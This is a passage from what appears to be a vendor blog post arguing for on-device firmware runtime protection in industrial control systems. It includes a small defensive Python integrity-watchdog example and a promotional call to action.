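As an illustration of the runtime-protection idea named above (a conceptual toy, not a description of Symbiote’s actual design), the monitor below hashes a fixed firmware region against a known-good baseline and alerts on any deviation.

# Toy firmware-integrity watchdog: periodically re-hash a firmware
# region and alert if it ever differs from the known-good baseline.
import hashlib
import time

def region_digest(path: str, offset: int, length: int) -> str:
    """SHA-256 of a fixed region of a firmware image."""
    with open(path, "rb") as f:
        f.seek(offset)
        return hashlib.sha256(f.read(length)).hexdigest()

def watch(path: str, offset: int, length: int, interval: float = 5.0) -> None:
    baseline = region_digest(path, offset, length)
    while True:
        if region_digest(path, offset, length) != baseline:
            print("ALERT: firmware region modified")  # a real system would notify operators
            break
        time.sleep(interval)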

 

On-device security is not meant to eliminate patching; rather, it provides a robust defense during the critical period between when a vulnerability is discovered (whether by an engineering team, a researcher, or an attacker) and when a patch can be created and applied. This is especially critical at the firmware level, since firmware patching typically takes longer than software patching.

 

Adoption of these solutions can greatly reduce the vulnerability of essential devices — and provide device manufacturers with a cutting-edge solution designed for modern deployments and their evolving risks.

 

The deployment of such protections is not a simple process. It requires careful engineering and an iterative process to properly calibrate the security controls so that there is no interference with the devices’ primary functionality. Security, safety and network engineers will have to work collaboratively to achieve a full integration of this technology into existing embedded systems.

 

The good news is that we have been at this juncture before. The challenge is to provide incentive without experiencing the full effects of attacks at the device level, which could easily lead to destruction of equipment, loss of necessary services or serious harm to operators.

 

Click below to learn more about how RBS’s solutions can work with your ICS system.

[1] Adapted from Cisco CPwE Architecture schematic.

[2] Joe Slowik, “Reassessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack,” Dragos, 2019.

